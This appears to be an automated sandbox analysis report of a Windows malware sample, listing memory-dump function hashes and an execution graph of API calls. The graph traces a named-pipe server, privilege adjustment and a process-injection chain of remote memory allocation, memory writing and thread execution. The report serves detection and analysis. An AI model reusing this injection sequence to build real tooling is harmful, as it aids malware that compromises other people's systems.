                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 449555515-0
                                                                                                      • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction ID: 698edeb1479480d0395b041c2fd804acd747e098864697457a4eaa04f62d6f66
                                                                                                      • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                      • Instruction Fuzzy Hash: 8B115B74212F4883FB249BA1E4D97E66AA6FB58B81F840429CE494F794EF3CD0298714
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                                                      • String ID: \\?\
                                                                                                      • API String ID: 2719912262-4282027825
                                                                                                      • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction ID: 537758a8525797fd475d04f0d48a4e9d919338496024da9a5461ab29499c535e
                                                                                                      • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                      • Instruction Fuzzy Hash: 69F04432304A4993E7208BA1F4D47E96B66F748B88FC48020CA494E994DF3CD65CCB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CombinePath
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3422762182-91387939
                                                                                                      • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction ID: 0aded69d13021f4290b452c685b05ae430db1f9ba5c97257655481bc1d089f38
                                                                                                      • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction Fuzzy Hash: 50F05430304F4492EB045B93B9C51E55A26EB48FD0F844131DD564FB58CF3CD5658700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction ID: 3bbbc512dc9b527b5a08f8f5c787c36b2a7ea106e5c71ef0781df340a2ed368e
                                                                                                      • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction Fuzzy Hash: ADF0FE71311E4893EB545BE0E8D43F52B66EB88B90FC42019954B8D5A5DF3CD5ACCB10
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 3230265001-0
                                                                                                      • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction ID: 9a6152dc826ce92f17b38d702ebbec9f60248a66bbc3fad4f0e46a3676463d2d
                                                                                                      • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                      • Instruction Fuzzy Hash: 88119031314F9487E7508B92E8D43E9AAA6F788FE4F940214EA5D8F7D4CF38D9248740
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U$d<m{8
                                                                                                      • API String ID: 442123175-23043668
                                                                                                      • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction ID: 9f4c000c02194ed71cc9866ea01a38a5f872a5551d92ee2f8c58adc49d9e6f1a
                                                                                                      • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction Fuzzy Hash: DD41A572715F8482EB209F65E4C47E9ABA2F798784F808125EF4D8B798DB3CD551CB40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual
                                                                                                      • String ID: NtQuerySystemInformation
                                                                                                      • API String ID: 2154932578-2549949336
                                                                                                      • Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction ID: 63923aeaa3db2958dc5aa537b59327ef8baa4b68400934d314d4c8dcdb7a4d5b
                                                                                                      • Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction Fuzzy Hash: 27F0A477214B4483E7108B65F4803FB6766F789B90F840124EE8E8AB44DF38D695CB00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction ID: 7bc19bb1cd192f66411804eb33a899b20a1ca411684180bedd583a5ca514a588
                                                                                                      • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction Fuzzy Hash: 3B819E32610F189AFB519BA5C8D07FD2EA2F744B84FC48116DF4A9BAD1DB38A466C310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocateFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 576844849-0
                                                                                                      • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction ID: 9ed737e72c5e53739e3390a0e30b26f1176aa9f95f17962c2cbcd25c5cbdd6ce
                                                                                                      • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction Fuzzy Hash: 1521BA32605F8482EB158FA9E4802EAF7E1FBC8B94F454110DE8D9F754EF38C5528700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1357844191-0
                                                                                                      • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction ID: 5bbb2ecfa74d26f1be751ed74199e31282ff47a5710e6e58ce819663bf283917
                                                                                                      • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction Fuzzy Hash: 38E0ED71611A0487E7049FB6D8953E97AE6FBC8F51F89C024C9490F390DF7D94A9CB50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CodeInfoPageValid
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 546120528-753981864
                                                                                                      • Opcode ID: 35d6533b1720f8da579d8e82cf18d97fc9af59e992c0e4d0a17b5eb86b4e7be8
                                                                                                      • Instruction ID: c4cccaf13f2e06b59fbddb07821cd9444172bc332055974c5361f7440949707c
                                                                                                      • Opcode Fuzzy Hash: 35d6533b1720f8da579d8e82cf18d97fc9af59e992c0e4d0a17b5eb86b4e7be8
                                                                                                      • Instruction Fuzzy Hash: 2681B17260AA8886F7658FA5A4C03FD7FE3E345740FD84116DA8A8F6D1DB38D961DB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction ID: d92c1fc35dbb274e8886666898b8e98769b739aada120b19a976d28340ae785a
                                                                                                      • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction Fuzzy Hash: 0671E732216F8946E724DFA999C43FA6B96F745B84FC4001ADE499BB88DF34C6248700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 3419175465-629598281
                                                                                                      • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction ID: f28ddab87ef8de6a133cd3c2b396961cf428b2a55da54b1610c565b4797e3c05
                                                                                                      • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction Fuzzy Hash: 0751B532712A588BEB14DFA5E4C4BF93B97F384B88F908124DE568B788DB75D991C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction ID: f8da05b1c2e571ef2f8cf25c10bc8bce6c9f07cffd3e19c0481a76f7f0cc7353
                                                                                                      • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction Fuzzy Hash: 9651D832206F8942E7349FB595D43FE6E52F385780F850029DD869BBD9CB39C5318B40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Info
                                                                                                      • String ID: $d<m{8
                                                                                                      • API String ID: 1807457897-974700232
                                                                                                      • Opcode ID: e4a143ca4120123da4d2f14e02aee1ec5d2bf5d6a13d88a6f2b8b94793a2fa23
                                                                                                      • Instruction ID: 1033782f94b7f0f30c32ded97ee0ec21c863ba91a22c78bfa1f42120233a6626
                                                                                                      • Opcode Fuzzy Hash: e4a143ca4120123da4d2f14e02aee1ec5d2bf5d6a13d88a6f2b8b94793a2fa23
                                                                                                      • Instruction Fuzzy Hash: 9F51C93261DAD486E725CF74D0C43ED7FA1F349B48F944116EA898BA89C778C555CF80
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 442123175-753981864
                                                                                                      • Opcode ID: 41a51caffb26de89bbe0c185f881ee4edcf50a5614ce5641243d2a174bd7e7c3
                                                                                                      • Instruction ID: 4070a08f3fc1058e230dc6dde15fe42708022f07a91c744b16972259c14ba40a
                                                                                                      • Opcode Fuzzy Hash: 41a51caffb26de89bbe0c185f881ee4edcf50a5614ce5641243d2a174bd7e7c3
                                                                                                      • Instruction Fuzzy Hash: F631B372311F5497DB10AF55E8C43EA67A2F748780F848026EB4D8B794DB38D561C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 442123175-753981864
                                                                                                      • Opcode ID: 52c4664a05fe08042f934c792fbe9bb495d98380603adefd8139ce93c4d597c0
                                                                                                      • Instruction ID: 13b481d5d560ec6c741b76e2009e32a533e71b359cc92e6783faae3e4d8779bd
                                                                                                      • Opcode Fuzzy Hash: 52c4664a05fe08042f934c792fbe9bb495d98380603adefd8139ce93c4d597c0
                                                                                                      • Instruction Fuzzy Hash: 3231B172614F8887DB109F65E4C47E97BA6F358784F848022EB8D8B795DB38D526CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastModuleName
                                                                                                      • String ID: d<m{8
                                                                                                      • API String ID: 2776309574-753981864
                                                                                                      • Opcode ID: 31f6bd162c74a95353f8a4d922ed4d515b5d77d8aca2042f3fab3af1802124d8
                                                                                                      • Instruction ID: b159d719a6e7d02145b4c9444b1655ed61654ad5bc94d10aff8866b82b66e2ca
                                                                                                      • Opcode Fuzzy Hash: 31f6bd162c74a95353f8a4d922ed4d515b5d77d8aca2042f3fab3af1802124d8
                                                                                                      • Instruction Fuzzy Hash: 6A31833221DFC887E760DBA5E4C03FA6BA6F388794F944115D68D8BA99DB38C550CF00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction ID: 6ff16c4684e6e7cbc76bef71a6a2d0f590b759f9b2b1dffb73ada4b5d238bf73
                                                                                                      • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction Fuzzy Hash: 1D11EF32215F8482EB618F55E5802A97BA5F788B98F584225EF8D4B764DF3CC565CB00

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:47.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:37.2%
                                                                                                      Total number of Nodes:231
                                                                                                      Total number of Limit Nodes:25
                                                                                                      execution_graph 406 7ff744dd2d84 407 7ff744dd2d91 406->407 409 7ff744dd2da6 Sleep 407->409 410 7ff744dd2db1 ConnectNamedPipe 407->410 417 7ff744dd1c64 AllocateAndInitializeSid 407->417 409->407 411 7ff744dd2e0f Sleep 410->411 412 7ff744dd2dc0 ReadFile 410->412 414 7ff744dd2e1a DisconnectNamedPipe 411->414 413 7ff744dd2de3 412->413 412->414 425 7ff744dd26ac 413->425 414->410 418 7ff744dd1cc1 SetEntriesInAclW 417->418 419 7ff744dd1d9c 417->419 418->419 421 7ff744dd1d1e LocalAlloc 418->421 419->407 421->419 422 7ff744dd1d32 InitializeSecurityDescriptor 421->422 422->419 423 7ff744dd1d44 SetSecurityDescriptorDacl 422->423 423->419 424 7ff744dd1d5c CreateNamedPipeW 423->424 424->419 426 7ff744dd26c1 WriteFile 425->426 427 7ff744dd26b9 425->427 426->414 429 7ff744dd10c0 427->429 467 7ff744dd19ac OpenProcess 429->467 432 7ff744dd14c5 432->426 433 7ff744dd1122 OpenProcess 433->432 434 7ff744dd113e OpenProcess 433->434 435 7ff744dd1161 K32GetModuleFileNameExW 434->435 436 7ff744dd1208 NtQueryInformationProcess 434->436 437 7ff744dd11aa CloseHandle 435->437 438 7ff744dd117a PathFindFileNameW lstrlenW 435->438 439 7ff744dd122f 436->439 440 7ff744dd14bc CloseHandle 436->440 437->436 442 7ff744dd11b8 437->442 438->437 441 7ff744dd1197 StrCpyW 438->441 439->440 443 7ff744dd123b OpenProcessToken 439->443 440->432 441->437 442->436 444 7ff744dd11e3 StrCmpIW 442->444 443->440 445 7ff744dd1259 GetTokenInformation 443->445 444->440 444->442 446 7ff744dd1281 GetLastError 445->446 447 7ff744dd12fc 445->447 446->447 449 7ff744dd128c LocalAlloc 446->449 448 7ff744dd1303 CloseHandle 447->448 448->440 454 7ff744dd1317 448->454 449->447 450 7ff744dd12a2 GetTokenInformation 449->450 451 7ff744dd12ea 450->451 452 7ff744dd12ca GetSidSubAuthorityCount GetSidSubAuthority 450->452 453 7ff744dd12f1 LocalFree 451->453 452->453 453->448 454->440 455 7ff744dd13a6 StrStrA 454->455 456 7ff744dd13ce 454->456 455->454 457 7ff744dd13d3 455->457 456->440 457->440 458 7ff744dd13fe VirtualAllocEx 457->458 458->440 459 7ff744dd142b WriteProcessMemory 458->459 459->440 460 7ff744dd1446 459->460 472 7ff744dd18f8 460->472 462 7ff744dd1466 462->440 463 7ff744dd1483 WaitForSingleObject 462->463 466 7ff744dd147c CloseHandle 462->466 464 7ff744dd1492 GetExitCodeThread 463->464 463->466 464->466 466->440 468 7ff744dd110e 467->468 469 7ff744dd19d8 IsWow64Process 467->469 468->432 468->433 470 7ff744dd19f8 CloseHandle 469->470 471 7ff744dd19ea 469->471 470->468 471->470 475 7ff744dd1a14 GetModuleHandleA 472->475 476 7ff744dd1a34 GetProcAddress 475->476 477 7ff744dd1914 475->477 476->477 478 7ff744dd2314 481 7ff744dd2328 478->481 506 7ff744dd2078 481->506 485 7ff744dd2078 14 API calls 486 7ff744dd23de GetCurrentProcessId OpenProcess 485->486 487 7ff744dd2486 FindResourceExA 486->487 488 7ff744dd2400 OpenProcessToken 486->488 489 7ff744dd24a6 SizeofResource 487->489 490 7ff744dd231d ExitProcess 487->490 491 7ff744dd247d CloseHandle 488->491 492 7ff744dd2419 LookupPrivilegeValueW 488->492 489->490 493 7ff744dd24bf LoadResource 489->493 491->487 492->491 494 7ff744dd2433 AdjustTokenPrivileges 492->494 493->490 495 7ff744dd24d3 LockResource GetCurrentProcessId 493->495 494->491 496 7ff744dd2477 GetLastError 494->496 523 7ff744dd17f8 GetProcessHeap HeapAlloc 495->523 496->491 498 7ff744dd24f0 RegCreateKeyExW 499 7ff744dd2532 ConvertStringSecurityDescriptorToSecurityDescriptorW 498->499 500 7ff744dd260d CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 